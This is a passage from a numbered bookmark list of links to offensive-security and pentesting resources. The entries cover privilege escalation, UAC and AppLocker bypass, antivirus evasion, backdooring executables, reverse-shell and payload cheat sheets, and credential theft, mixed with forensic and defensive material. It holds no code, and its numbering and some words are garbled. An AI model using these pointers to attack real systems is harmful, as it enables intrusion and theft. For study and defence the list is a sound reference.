File:\n\n\nhttp://www.hackingarticles.in/multiple-ways-to-get-root-through-writable-file\n\n\n-180-MySQL Penetration Testing with Nmap:\n\n\nhttp://www.hackingarticles.in/mysql-penetration-testing-nmap\n\n\n-181-NetBIOS and SMB Penetration Testing on Windows:\n\n\nhttp://www.hackingarticles.in/netbios-and-smb-penetration-testing-on-windows\n\n\n-182-Network Packet Forensic using Wireshark:\n\n\nhttp://www.hackingarticles.in/network-packet-forensic-using-wireshark\n\n\n-183-Escape and Evasion Egressing Restricted Networks:\n\n\nhttps://www.optiv.com/blog/escape-and-evasion-egressing-restricted-networks/\n\n\n-183-Awesome-Hacking-Resources:\n\n\nhttps://github.com/vitalysim/Awesome-Hacking-Resources\n\n\n-184-Hidden directories and les as a source of sensitive information about web application:\n\n\nhttps://medium.com/p/84e5c534e5ad\n\n\n-185-Hiding Registry keys with PSRe ect:\n\n\nhttps://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353\n\n\n-186-awesome-cve-poc:\n\n\nhttps://github.com/qazbnm456/awesome-cve-poc\n\n\n-187-Linux Capabilities Privilege Escalation via OpenSSL with SELinux Enabled and Enforced:\n\n\nhttps://medium.com/p/74d2bec02099\n\n\n-188-Post Exploitation in Windows using dir Command:\n\n\nhttp://www.hackingarticles.in/post-exploitation-windows-using-dir-command\n\n\n189-Web Application Firewall (WAF) Evasion Techniques #2:\n\n\nhttps://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0\n\n\n-190-Forensics Investigation of Remote PC (Part 1):\n\n\nhttp://www.hackingarticles.in/forensics-investigation-of-remote-pc-part-1\n\n\n-191-CloudFront Hijacking:\n\n\nhttps://www.mindpointgroup.com/blog/pen-test/cloudfront-hijacking/\n\n\n-192-PowerPoint and Custom Actions:\n\n\nhttps://cofense.com/powerpoint-and-custom-actions/\n\n\n-193-Privilege Escalation on Windows 7,8,10, Server 2008, Server 2012 using Potato:\n\n\nhttp://www.hackingarticles.in/privilege-escalation-on-windows-7810-server-2008-server-2012-using-potato\n\n\n-194-How to intercept TOR hidden service requests with Burp:\n\n\nhttps://medium.com/p/6214035963a0\n\n\n-195-How to Make a Captive Portal of Death:\n\n\nhttps://medium.com/p/48e82a1d81a/share/twitter\n\n\n-196-How to find any CEO’s email address in minutes:\n\n\nhttps://medium.com/p/70dcb96e02b0\n\n\n197-Microsoft Windows 10 - Child Process Restriction Mitigation Bypass:\n\n\nhttps://www.exploit-db.com/download/44888.txt\n\n\n-198-Microsoft Windows - Token Process Trust SID Access Check Bypass Privilege Escalation:\n\n\nhttps://www.exploit-db.com/download/44630.txt\n\n\n-199-Microsoft Word upload to Stored XSS:\n\n\nhttps://www.n00py.io/2018/03/microsoft-word-upload-to-stored-xss/\n\n\n-200-MobileApp-Pentest-Cheatsheet:\n\n\nhttps://github.com/tanprathan/MobileApp-Pentest-Cheatsheet\n\n\n-201-awesome:\n\n\nhttps://github.com/sindresorhus/awesome\n\n\n-201-writing arm shellcode:\n\nhttps://azeria-labs.com/writing-arm-shellcode/\n\n\n-202-debugging with gdb introduction:\n\n\nhttps://azeria-labs.com/debugging-with-gdb-introduction/\n\n\n-203-emulate raspberrypi with qemu:\n\n\nhttps://azeria-labs.com/emulate-raspberry-pi-with-qemu/\n\n\n-204-Bash One-Liner to Check Your Password(s) via pwnedpasswords.com’s API Using the k-Anonymity Method:\n\n\nhttps://medium.com/p/a5807a9a8056\n\n\n-205-A Red Teamer's guide to pivoting:\n\n\nhttps://artkond.com/2017/03/23/pivoting-guide/\n\n\n-206-Using WebDAV features as a covert channel:\n\n\nhttps://arno0x0x.wordpress.com/2017/09/07/using-webdav-features-as-a-covert-channel/\n\n\n-207-A View of Persistence:\n\n\nhttps://rastamouse.me/2018/03/a-view-of-persistence/\n\n\n-208- pupy websocket transport:\n\n\nhttps://bitrot.sh/post/28-11-2017-pupy-websocket-transport/\n\n\n-209-Subdomains Enumeration Cheat Sheet:\n\n\nhttps://pentester.land/cheatsheets/2018/11/.../subdomains-enumeration-cheatsheet.html\n\n\n-210-DNS Reconnaissance – DNSRecon:\n\n\nhttps://pentestlab.blog/2012/11/13/dns-reconnaissance-dnsrecon/\n\n\n-211-Cheatsheets:\n\n\nhttps://bitrot.sh/cheatsheet\n\n\n-212-Understanding Guide to Nmap Firewall Scan (Part 2):\n\n\nhttp://www.hackingarticles.in/understanding-guide-nmap-firewall-scan-part-2\n\n\n-213-Exploit Office 2016 using CVE-2018-0802:\n\n\nhttps://technologyredefine.blogspot.com/2018/01/exploit-office-2016-using-cve-2018-0802.html\n\n\n-214-windows-exploit-suggester:\n\n\nhttps://technologyredefine.blogspot.com/2018/01/windows-exploit-suggester.html\n\n\n-215-INSTALLING PRESISTENCE BACKDOOR IN WINDOWS:\n\n\nhttps://technologyredefine.blogspot.com/2018/01/installing-presistence-backdoor-in.html\n\n\n-216-IDS, IPS AND FIREWALL EVASION USING NMAP:\n\n\nhttps://technologyredefine.blogspot.com/2017/09/ids-ips-and-firewall-evasion-using-nmap.html\n\n\n-217-Wireless Penetration Testing Checklist – A Detailed Cheat Sheet:\n\n\nhttps://gbhackers.com/wireless-penetration-testing-checklist-a-detailed-cheat-sheet\n\n\n218-Most Important Web Application Security Tools & Resources for Hackers and Security Professionals:\n\n\nhttps://gbhackers.com/web-application-security-tools-resources\n\n\n-219-Web Application Penetration Testing Checklist – A Detailed Cheat Sheet:\n\n\nhttps://gbhackers.com/web-application-penetration-testing-checklist-a-detailed-cheat-sheet\n\n\n-220-Top 500 Most Important XSS Script Cheat Sheet for Web Application Penetration Testing:\n\n\nhttps://gbhackers.com/top-500-important-xss-cheat-sheet\n\n\n-221-USBStealer – Password Hacking Tool For Windows Machine Applications:\n\n\nhttps://gbhackers.com/pasword-hacking\n\n\n-222-Most Important Mobile Application Penetration Testing Cheat sheet with Tools & Resources for Security Professionals:\n\n\nhttps://gbhackers.com/mobile-application-penetration-testing\n\n\n-223-Metasploit Can Be Directly Used For Hardware Penetration Testing Now:\n\n\nhttps://gbhackers.com/metasploit-can-be-directly-used-for-hardware-vulnerability-testing-now\n\n\n-224-How to Perform Manual SQL Injection While Pentesting With Single quote Error Based Parenthesis Method:\n\n\nhttps://gbhackers.com/manual-sql-injection-2\n\n\n-225-Email Spoo ng – Exploiting Open Relay configured Public Mailservers:\n\n\nhttps://gbhackers.com/email-spoofing-exploiting-open-relay\n\n\n-226-Email Header Analysis – Received Email is Genuine or Spoofed:\n\n\nhttps://gbhackers.com/email-header-analysis\n\n\n-227-Most Important Cyber Threat Intelligence Tools List For Hackers and Security Professionals:\n\n\nhttps://gbhackers.com/cyber-threat-intelligence-tools\n\n\n-228-Creating and Analyzing a Malicious PDF File with PDF-Parser Tool:\n\n\nhttps://gbhackers.com/creating-and-analyzing-a-malicious-pdf-file-with-pdf-parser-tool\n\n\n-229-Commix – Automated All-in-One OS Command Injection and Exploitation Tool:\n\n\nhttps://gbhackers.com/commix-automated-all-in-one-os-command-injection-and-exploitation-tool\n\n\n-230-Advanced ATM Penetration Testing Methods:\n\n\nhttps://gbhackers.com/advanced-atm-penetration-testing-methods\n\n\n-231-A8-Cross-Site Request Forgery (CSRF):\n\n\nhttps://gbhackers.com/a8-cross-site-request-forgery-csrf\n\n\n-232-Fully undetectable backdooring PE File:\n\n\nhttps://haiderm.com/fully-undetectable-backdooring-pe-file/\n\n-233-backdooring exe files:\n\n\nhttps://haiderm.com/tag/backdooring-exe-files/\n\n\n-234-From PHP (s)HELL to Powershell Heaven:\n\n\nhttps://medium.com/p/da40ce840da8\n\n\n-235-Forensic Investigation of Nmap Scan using Wireshark:\n\n\nhttp://www.hackingarticles.in/forensic-investigation-of-nmap-scan-using-wireshark\n\n\n-236-Unleashing an Ultimate XSS Polyglot:\n\n\nhttps://github.com/0xsobky/HackVault/wiki\n\n\n-237-wifi-arsenal:\n\n\nhttps://github.com/0x90/wifi-arsenal\n\n\n-238-XXE_payloads:\n\n\nhttps://gist.github.com/staaldraad/01415b990939494879b4\n\n\n-239-xss_payloads_2016:\n\n\nhttps://github.com/7ioSecurity/XSS-Payloads/raw/master/xss_payloads_2016\n\n\n-240-A curated list of awesome command-line frameworks, toolkits, guides and gizmos. Inspired by awesome-php.:\n\n\nhttps://github.com/alebcay/awesome-shell\n\n\n-241-The goal of this repository is to document the most common techniques to bypass AppLocker.:\n\n\nhttps://github.com/api0cradle/UltimateAppLockerByPassList\n\n\n-242-A curated list of CTF frameworks, libraries, resources and softwares:\n\n\nhttps://github.com/apsdehal/awesome-ctf\n\n\n-243-A collection of android security related resources:\n\n\nhttps://github.com/ashishb/android-security-awesome\n\n\n-244-OSX and iOS related security tools:\n\n\nhttps://github.com/ashishb/osx-and-ios-security-awesome\n\n\n-245-regexp-security-cheatsheet:\n\n\nhttps://github.com/attackercan/regexp-security-cheatsheet\n\n\n-246-PowerView-2.0 tips and tricks:\n\n\nhttps://gist.github.com/HarmJ0y/3328d954607d71362e3c\n\n\n-247-A curated list of awesome awesomeness:\n\n\nhttps://github.com/bayandin/awesome-awesomeness\n\n\n-248-Android App Security Checklist:\n\n\nhttps://github.com/b-mueller/android_app_security_checklist\n\n\n-249-Crack WPA/WPA2 Wi-Fi Routers with Airodump-ng and Aircrack-ng/Hashcat:\n\n\nhttps://github.com/brannondorsey/wifi-cracking\n\n\n-250-My-Gray-Hacker-Resources:\n\n\nhttps://github.com/bt3gl/My-Gray-Hacker-Resources\n\n\n-251-A collection of tools developed by other researchers in the Computer Science area to process network traces:\n\n\nhttps://github.com/caesar0301/awesome-pcaptools\n\n\n-252-A curated list of awesome Hacking tutorials, tools and resources:\n\n\nhttps://github.com/carpedm20/awesome-hacking\n\n\n-253-RFSec-ToolKit is a collection of Radio Frequency Communication Protocol Hacktools.:\n\n\nhttps://github.com/cn0xroot/RFSec-ToolKit\n\n\n-254-Collection of the cheat sheets useful for pentesting:\n\n\nhttps://github.com/coreb1t/awesome-pentest-cheat-sheets\n\n\n-255-Collection of the cheat sheets useful for pentesting:\n\n\nhttps://github.com/coreb1t/awesome-pentest-cheat-sheets\n\n\n-256-Collection of the cheat sheets useful for pentesting:\n\n\nhttps://github.com/coreb1t/awesome-pentest-cheat-sheets\n\n\n-257-A curated list of awesome forensic analysis tools and resources:\n\n\nhttps://github.com/cugu/awesome-forensics\n\n\n-258-Open-Redirect-Payloads:\n\n\nhttps://github.com/cujanovic/Open-Redirect-Payloads\n\n\n-259-A Threat hunter's playbook to aid the development of techniques and hypothesis for hunting campaigns.:\n\n\nhttps://github.com/Cyb3rWard0g/ThreatHunter-Playbook\n\n\n-260-Windows memory hacking library:\n\n\nhttps://github.com/DarthTon/Blackbone\n\n\n-261-A collective list of public JSON APIs for use in security.:\n\n\nhttps://github.com/deralexxx/security-apis\n\n\n-262-An authoritative list of awesome devsecops tools with the help from community experiments and contributions.:\n\n\nhttps://github.com/devsecops/awesome-devsecops\n\n\n-263-List of Awesome Hacking places, organised by Country and City, listing if it features power and wifi:\n\n\nhttps://github.com/diasdavid/awesome-hacking-spots\n\n\n-264-A comprehensive curated list of available Bug Bounty & Disclosure Programs and Write-ups:\n\n\nhttps://github.com/djadmin/awesome-bug-bounty\n\n\n-265-Notes for taking the OSCP in 2097:\n\n\nhttps://github.com/dostoevskylabs/dostoevsky-pentest-notes\n\n\n-266-A curated list of awesome Windows Exploitation resources, and shiny things. Inspired by awesom:\n\n\nhttps://github.com/enddo/awesome-windows-exploitation\n\n\n-267-A curated list of resources (books, tutorials, courses, tools and vulnerable applications) for learning about Exploit Development:\n\n\nhttps://github.com/FabioBaroni/awesome-exploit-development\n\n\n-268-A curated list of awesome reversing resources:\n\n\nhttps://github.com/fdivrp/awesome-reversing\n\n\n-269-Git All the Payloads! A collection of web attack payloads:\n\n\nhttps://github.com/foospidy/payloads\n\n\n-270-GitHub Project Resource List:\n\n\nhttps://github.com/FuzzySecurity/Resource-List\n\n\n-271-Use your macOS terminal shell to do awesome things.:\n\n\nhttps://github.com/herrbischoff/awesome-macos-command-line\n\n\n-272-Defeating Windows User Account Control:\n\n\nhttps://github.com/hfiref0x/UACME\n\n\n-273-Free Security and Hacking eBooks:\n\nhttps://github.com/Hack-with-Github/Free-Security-eBooks\n\n\n-274-Universal Radio Hacker: investigate wireless protocols like a boss:\n\n\nhttps://github.com/jopohl/urh\n\n\n-275-A curated list of movies every hacker & cyberpunk must watch:\n\n\nhttps://github.com/k4m4/movies-for-hackers\n\n\n-276-Various public documents, whitepapers and articles about APT campaigns:\n\n\nhttps://github.com/kbandla/APTnotes\n\n\n-277-A database of common, interesting or useful commands, in one handy referable form:\n\n\nhttps://github.com/leostat/rtfm\n\n\n-278-A curated list of tools for incident response:\n\n\nhttps://github.com/meirwah/awesome-incident-response\n\n\n-279-A curated list of awesome guides, tools, and other resources related to the security and compromise of locks, safes, and keys:\n\n\nhttps://github.com/meitar/awesome-lockpicking\n\n\n-280-A curated list of static analysis tools, linters and code quality checkers for various programming languages:\n\n\nhttps://github.com/mre/awesome-static-analysis\n\n\n-281-A Collection of Hacks in IoT Space so that we can address them (hopefully):\n\n\nhttps://github.com/nebgnahz/awesome-iot-hacks\n\n\n-281-A Course on Intermediate Level Linux Exploitation:\n\n\nhttps://github.com/nnamon/linux-exploitation-course\n\n\n-282-Kali Linux Cheat Sheet for Penetration Testers:\n\n\nhttps://github.com/NoorQureshi/kali-linux-cheatsheet\n\n\n-283-A curated list of awesome infosec courses and training resources.:\n\n\nhttps://github.com/onlurking/awesome-infosec\n\n\n-284-A curated list of resources for learning about application security:\n\n\nhttps://github.com/paragonie/awesome-appsec\n\n\n-285-an awesome list of honeypot resources:\n\n\nhttps://github.com/paralax/awesome-honeypots\n\n\n\n286-GitHub Enterprise SQL Injection:\n\n\nhttps://www.blogger.com/share-post.g?blogID=2987759532072489303&postID=6980097238231152493\n\n\n-287-A curated list of fuzzing resources ( Books, courses - free and paid, videos, tools, tutorials and vulnerable applications to practice on ) for learning Fuzzing and initial phases of Exploit Development like root cause analysis:\n\n\nhttps://github.com/secfigo/Awesome-Fuzzing\n\n\n-288-PHP htaccess injection cheat sheet:\n\n\nhttps://github.com/sektioneins/pcc/wiki\n\n\n-289-A curated list of the awesome resources about the Vulnerability Research:\n\n\nhttps://github.com/sergey-pronin/Awesome-Vulnerability-Research\n\n\n-290-A list of useful payloads and bypass for Web Application Security and Pentest/CTF:\n\n\nhttps://github.com/swisskyrepo/PayloadsAllTheThings\n\n\n-291-A collection of Red Team focused tools, scripts, and notes:\n\n\nhttps://github.com/threatexpress/red-team-scripts\n\n\n-292-Awesome XSS stuff:\n\n\nhttps://github.com/UltimateHackers/AwesomeXSS\n\n\n-293-A collection of hacking / penetration testing resources to make you better!:\n\n\nhttps://github.com/vitalysim/Awesome-Hacking-Resources\n\n\n-294-Docker Cheat Sheet:\n\n\nhttps://github.com/wsargent/docker-cheat-sheet\n\n\n-295-Decrypted content of eqgrp-auction-file.tar.xz:\n\n\nhttps://github.com/x0rz/EQGRP\n\n\n-296-A bunch of links related to Linux kernel exploitation:\n\n\nhttps://github.com/xairy/linux-kernel-exploitation\n\n\n-297-Penetration Testing 102 - Windows Privilege Escalation Cheatsheet:\n\n\nwww.exumbraops.com/penetration-testing-102-windows-privilege-escalation-cheatsheet\n\n\n-298-Pentesting Cheatsheet:\n\n\nhttps://anhtai.me/pentesting-cheatsheet/\n\n\n-299-Windows Privilege Escalation Methods for Pentesters:\n\n\nhttps://pentest.blog/windows-privilege-escalation-methods-for-pentesters/\n\n\n-300-Penetration Testing Cheat Sheet For Windows Machine – Intrusion Detection:\n\n\n-301-Reading Your Way Around UAC (Part 1):\n\n\nhttps://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html\n\n\n\n-302--Reading Your Way Around UAC (Part 2):\n\n\nhttps://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html\n\n\n\n-303-Executing Metasploit & Empire Payloads from MS Office Document Properties (part 2 of 2):\n\n\nhttps://stealingthe.network/executing-metasploit-empire-payloads-from-ms-office-document-properties-part-2-of-2/\n\n\n-304-SSRF - Server Side Request Forgery (Types and ways to exploit it) Part-1:\n\n\nhttps://medium.com/p/29d034c27978\n\n\n-304-Automating Cobalt Strike,Aggressor Collection Scripts:\n\n\n\nhttps://github.com/bluscreenofjeff/AggressorScripts\n\n\n\nhttps://github.com/harleyQu1nn/AggressorScripts\n\n\n-305-Vi Cheat Sheet:\n\n\nhttps://highon.coffee/blog/vi-cheat-sheet/\n\n\n-306-Network Recon Cheat Sheet:\n\n\nhttps://www.cheatography.com/coffeefueled/cheat-sheets/network-recon/\n\n\n-307-LFI Cheat Sheet:\n\n\nhttps://highon.coffee/blog/lfi-cheat-sheet/\n\n\n-308-Systemd Cheat Sheet:\n\n\nhttps://highon.coffee/blog/systemd-cheat-sheet/\n\n\n-309-Aircrack-ng Cheatsheet:\n\n\nhttps://securityonline.info/aircrack-ng-cheatsheet/\n\n\n-310-Kali Linux Cheat Sheet for Penetration Testers:\n\n\nhttps://www.blackmoreops.com/?p=7212\n\n\n\n-311-Wifi Pentesting Command Cheatsheet:\n\n\nhttps://randomkeystrokes.com/2016/07/01/wifi-pentesting-cheatsheet/\n\n\n-312-Android Testing Environment Cheatsheet (Part 1):\n\n\nhttps://randomkeystrokes.com/2016/10/17/android-testing-environment-cheatsheet/\n\n\n-313-cheatsheet:\n\n\nhttps://randomkeystrokes.com/category/cheatsheet/\n\n\n-314-Reverse Shell Cheat Sheet:\n\n\nhttps://highon.coffee/blog/reverse-shell-cheat-sheet/\n\n\n-315-Linux Commands Cheat Sheet:\n\n\nhttps://highon.coffee/blog/linux-commands-cheat-sheet/\n\n\n-316-Linux Privilege Escalation using Sudo Rights:\n\n\nhttp://www.hackingarticles.in/linux-privilege-escalation-using-exploiting-sudo-rights\n\n\n-317-Linux Privilege Escalation using Misconfigured NFS:\n\n\nhttp://www.hackingarticles.in/linux-privilege-escalation-using-misconfigured-nfs/\n\n\n-318-Linux Privilege Escalation by Exploiting Cronjobs:\n\n\nhttp://www.hackingarticles.in/linux-privilege-escalation-by-exploiting-cron-jobs/\n\n\n-319-Web Penetration Testing:\n\n\nhttp://www.hackingarticles.in/web-penetration-testing/\n\n\n-320-Webshell to Meterpreter:\n\n\nhttp://www.hackingarticles.in/webshell-to-meterpreter\n\n\n-321-WordPress Penetration Testing using WPScan & Metasploit:\n\n\nhttp://www.hackingarticles.in/wordpress-penetration-testing-using-wpscan-metasploit\n\n\n-322-XSS Exploitation in DVWA (Bypass All Security):\n\n\nhttp://www.hackingarticles.in/xss-exploitation-dvwa-bypass-security\n\n\n-323-Linux Privilege Escalation Using PATH Variable:\n\n\nhttp://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/\n\n\n-324-VNC tunneling over SSH:\n\n\nhttp://www.hackingarticles.in/vnc-tunneling-ssh\n\n\n-325-VNC Pivoting through Meterpreter:\n\n\nhttp://www.hackingarticles.in/vnc-pivoting-meterpreter\n\n\n-326-Week of Evading Microsoft ATA - Announcement and Day 1:\n\n\nhttps://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day1.html\n\n\n-327-Abusing DNSAdmins privilege for escalation in Active Directory:\n\n\nhttps://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html\n\n\n-328-Using SQL Server for attacking a Forest Trust:\n\n\nhttps://www.labofapenetrationtester.com/2017/03/using-sql-server-for-attacking-forest-trust.html\n\n\n-329-Empire :\n\n\nhttp://www.harmj0y.net/blog/category/empire/\n\n\n-330-8 Deadly Commands You Should Never Run on Linux:\n\n\nhttps://www.howtogeek.com/125157/8-deadly-commands-you-should-never-run-on-linux/\n\n\n-331-External C2 framework for Cobalt Strike:\n\n\nhttps://www.insomniacsecurity.com/2018/01/11/externalc2.html\n\n\n-332-How to use Public IP on Kali Linux:\n\n\nhttp://www.hackingarticles.in/use-public-ip-kali-linux\n\n\n-333-Bypass Admin access through guest Account in windows 10:\n\n\nhttp://www.hackingarticles.in/bypass-admin-access-guest-account-windows-10\n\n\n-334-Bypass Firewall Restrictions with Metasploit (reverse_tcp_allports):\n\n\nhttp://www.hackingarticles.in/bypass-firewall-restrictions-metasploit-reverse_tcp_allports\n\n\n-335-Bypass SSH Restriction by Port Relay:\n\n\nhttp://www.hackingarticles.in/bypass-ssh-restriction-by-port-relay\n\n\n-336-Bypass UAC Protection of Remote Windows 10 PC (Via FodHelper Registry Key):\n\n\nhttp://www.hackingarticles.in/bypass-uac-protection-remote-windows-10-pc-via-fodhelper-registry-key\n\n\n-337-Bypass UAC in Windows 10 using bypass_comhijack Exploit:\n\n\nhttp://www.hackingarticles.in/bypass-uac-windows-10-using-bypass_comhijack-exploit\n\n\n-338-Bind Payload using SFX archive with Trojanizer:\n\n\nhttp://www.hackingarticles.in/bind-payload-using-sfx-archive-trojanizer\n\n\n-339-Capture NTLM Hashes using PDF (Bad-Pdf):\n\n\nhttp://www.hackingarticles.in/capture-ntlm-hashes-using-pdf-bad-pdf\n\n\n-340-Best of Post Exploitation Exploits & Tricks:\n\n\nhttp://www.hackingarticles.in/best-of-post-exploitation-exploits-tricks/\n\n\n-341-Detect SQL Injection Attack using Snort IDS:\n\n\nhttp://www.hackingarticles.in/detect-sql-injection-attack-using-snort-ids/\n\n\n-342-Beginner Guide to Website Footprinting:\n\n\nhttp://www.hackingarticles.in/beginner-guide-website-footprinting/\n\n\n-343-How to Enable and Monitor Firewall Log in Windows PC:\n\n\nhttp://www.hackingarticles.in/enable-monitor-firewall-log-windows-pc/\n\n\n-344-Wifi Post Exploitation on Remote PC:\n\n\nhttp://www.hackingarticles.in/wifi-post-exploitation-remote-pc/\n\n\n-335-Check Meltdown Vulnerability in CPU:\n\n\nhttp://www.hackingarticles.in/check-meltdown-vulnerability-cpu\n\n\n-336-XXE:\n\n\nhttps://phonexicum.github.io/infosec/xxe.html\n\n\n-337-[XSS] Re ected XSS Bypass Filter:\n\n\nhttps://medium.com/p/de41d35239a3\n\n\n-338-Engagement Tools Tutorial in Burp suite:\n\n\nhttp://www.hackingarticles.in/engagement-tools-tutorial-burp-suite\n\n\n-339-Wiping Out CSRF:\n\n\nhttps://medium.com/@jrozner/wiping-out-csrf-ded97ae7e83f\n\n\n-340-First entry: Welcome and fileless UAC bypass:\n\n\nhttps://winscripting.blog/2017/05/12/first-entry-welcome-and-uac-bypass/\n\n\n-341-Writing a Custom Shellcode Encoder:\n\n\nhttps://medium.com/p/31816e767611\n\n\n-342-Security Harden CentOS 7 :\n\n\nhttps://highon.coffee/blog/security-harden-centos-7/\n\n\n-343-THE BIG BAD WOLF - XSS AND MAINTAINING ACCESS:\n\n\nhttps://www.paulosyibelo.com/2018/06/the-big-bad-wolf-xss-and-maintaining.html\n\n\n-344-MySQL:\n\n\nhttps://websec.ca/kb/CHANGELOG.txt\n\n\n-345-Deobfuscation of VM based software protection:\n\n\nhttp://shell-storm.org/talks/SSTIC2017_Deobfuscation_of_VM_based_software_protection.pdf\n\n\n-346-Online Assembler and Disassembler:\n\n\nhttp://shell-storm.org/online/Online-Assembler-and-Disassembler/\n\n\n-347-Shellcodes database for study cases:\n\n\nhttp://shell-storm.org/shellcode/\n\n\n-348-Dynamic Binary Analysis and Obfuscated Codes:\n\n\nhttp://shell-storm.org/talks/sthack2016-rthomas-jsalwan.pdf\n\n\n-349-How Triton may help to analyse obfuscated binaries:\n\n\nhttp://triton.quarkslab.com/files/misc82-triton.pdf\n\n\n-350-Triton: A Concolic Execution Framework:\n\n\nhttp://shell-storm.org/talks/SSTIC2015_English_slide_detailed_version_Triton_Concolic_Execution_FrameWork_FSaudel_JSalwan.pdf\n\n\n-351-Automatic deobfuscation of the Tigress binary protection using symbolic execution and LLVM:\n\n\nhttps://github.com/JonathanSalwan/Tigress_protection\n\n\n-352-What kind of semantics information Triton can provide?:\n\n\nhttp://triton.quarkslab.com/blog/What-kind-of-semantics-information-Triton-can-provide/\n\n\n-353-Code coverage using a dynamic symbolic execution:\n\n\nhttp://triton.quarkslab.com/blog/Code-coverage-using-dynamic-symbolic-execution/\n\n\n-354-Triton (concolic execution framework) under the hood:\n\n\nhttp://triton.quarkslab.com/blog/first-approach-with-the-framework/\n\n\n-355-- Stack and heap overflow detection at runtime via behavior analysis and Pin:\n\n\nhttp://shell-storm.org/blog/Stack-and-heap-overflow-detection-at-runtime-via-behavior-analysis-and-PIN/\n\n\n-356-Binary analysis: Concolic execution with Pin and z3:\n\n\nhttp://shell-storm.org/blog/Binary-analysis-Concolic-execution-with-Pin-and-z3/\n\n\n-357-In-Memory fuzzing with Pin:\n\n\nhttp://shell-storm.org/blog/In-Memory-fuzzing-with-Pin/\n\n\n-358-Hackover 2015 r150 (outdated solving for Triton use cases):\n\n\nhttps://github.com/JonathanSalwan/Triton/blob/master/src/examples/python/ctf-writeups/hackover-ctf-2015-r150/solve.py\n\n\n-359-Skip sh – Web Application Security Scanner for XSS, SQL Injection, Shell injection:\n\n\nhttps://gbhackers.com/skipfish-web-application-security-scanner\n\n\n-360-Sublist3r – Tool for Penetration testers to Enumerate Sub-domains:\n\n\nhttps://gbhackers.com/sublist3r-penetration-testers\n\n\n-361-bypassing application whitelisting with bginfo:\n\n\n\nhttps://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/\n\n\n-362-accessing-clipboard-from-the-lock-screen-in-windows-10:\n\n\nhttps://oddvar.moe/2017/01/24/accessing-clipboard-from-the-lock-screen-in-windows-10/\n\n\n-363-bypassing-device-guard-umci-using-chm-cve-2017-8625:\n\n\nhttps://oddvar.moe/2017/08/13/bypassing-device-guard-umci-using-chm-cve-2017-8625/\n\n\n-364-defense-in-depth-writeup:\n\n\nhttps://oddvar.moe/2017/09/13/defense-in-depth-writeup/\n\n\n-365-applocker-case-study-how-insecure-is-it-really-part-1:\n\n\nhttps://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/\n\n\n-366-empires-cross-platform-office-macro:\n\n\nhttps://www.blackhillsinfosec.com/empires-cross-platform-office-macro/\n\n\n-367-recon tools:\n\n\nhttps://blackarch.org/recon.html\n\n\n-368-Black Hat 2018 tools list:\n\n\nhttps://medium.com/p/991fa38901da\n\n\n-369-Application Introspection & Hooking With Frida:\n\n\nhttps://www.fuzzysecurity.com/tutorials/29.html\n\n\n-370-And I did OSCP!:\n\n\nhttps://medium.com/p/589babbfea19\n\n\n-371-CoffeeMiner: Hacking WiFi to inject cryptocurrency miner to HTML requests:\n\n\nhttps://arnaucube.com/blog/coffeeminer-hacking-wifi-cryptocurrency-miner.html\n\n\n-372-Most Important Endpoint Security & Threat Intelligence Tools List for Hackers and Security Professionals:\n\n\nhttps://gbhackers.com/threat-intelligence-tools\n\n\n-373-Penetration Testing Cheat Sheet For Windows Machine – Intrusion Detection:\n\n\nhttps://techincidents.com/penetration-testing-cheat-sheet/\n\n\n-374-privilege escalation:\n\n\nhttps://toshellandback.com/category/privilege-escalation/\n\n\n-375-The Complete List of Windows Post-Exploitation Commands (No Powershell):\n\n\nhttps://medium.com/p/999b5433b61e\n\n\n-376-The Art of Subdomain Enumeration:\n\n\nhttps://blog.sweepatic.com/tag/subdomain-enumeration/\n\n\n-377-The Principles of a Subdomain Takeover:\n\n\nhttps://blog.sweepatic.com/subdomain-takeover-principles/\n\n\n-378-The journey of Web Cache + Firewall Bypass to SSRF to AWS credentials compromise!:\n\n\nhttps://medium.com/p/b250fb40af82\n\n\n-379-The Solution for Web for Pentester-I:\n\n\nhttps://medium.com/p/4c21b3ae9673\n\n\n-380-The Ultimate Penetration Testing Command Cheat Sheet for Linux:\n\n\nhttps://www.hackingloops.com/command-cheat-sheet-for-linux/\n\n\n-381-: Ethical Hacking, Hack Tools, Hacking Tricks, Information Gathering, Penetration Testing, Recommended:\n\n\nhttps://www.hackingloops.com/hacking-tricks/\n\n\n-383-Introduction to Exploitation, Part 1: Introducing Concepts and Terminology:\n\n\nhttps://www.hackingloops.com/exploitation-terminology/\n\n\n-384-How Hackers Kick Victims Off of Wireless Networks:\n\n\nhttps://www.hackingloops.com/kick-victims-off-of-wireless-networks/\n\n\n-385-Maintaining Access Part 1: Introduction and Metasploit Example:\n\n\nhttps://www.hackingloops.com/maintaining-access-metasploit/\n\n\n-386-How to Steal Windows Credentials with Mimikatz and Metasploit:\n\n\nhttps://www.hackingloops.com/mimikatz/\n\n\n-387-Evading Anti-virus Part 2: Obfuscating Payloads with Msfvenom:\n\n\nhttps://www.hackingloops.com/msfvenom/\n\n\n-388-Evading Anti-virus Part 1: Infecting EXEs with Shellter:\n\n\nhttps://www.hackingloops.com/evading-anti-virus-shellter/\n\n\n-389-Mobile Hacking Part 4: Fetching Payloads via USB Rubber Ducky:\n\n\nhttps://www.hackingloops.com/payloads-via-usb-rubber-ducky/\n\n\n-390-Ethical Hacking Practice Test 6 – Footprinting Fundamentals Level1:\n\n\nhttps://www.hackingloops.com/ethical-hacking-practice-test-6-footprinting-fundamentals-level1/\n\n\n-391-Skip Cracking Responder Hashes and Relay Them:\n\n\nhttps://threat.tevora.com/quick-tip-skip-cracking-responder-hashes-and-replay-them/\n\n\n-392-Cracking NTLMv1 Handshakes with Crack.sh:\n\n\nhttp://threat.tevora.com/quick-tip-crack-ntlmv1-handshakes-with-crack-sh/\n\n\n-393-Top 3 Anti-Forensic OpSec Tips for Linux & A New Dead Man’s Switch:\n\n\nhttps://medium.com/p/d5e92843e64a\n\n\n-394-VNC Penetration Testing (Port 5901):\n\n\nhttp://www.hackingarticles.in/vnc-penetration-testing\n\n\n-395-Windows Privilege 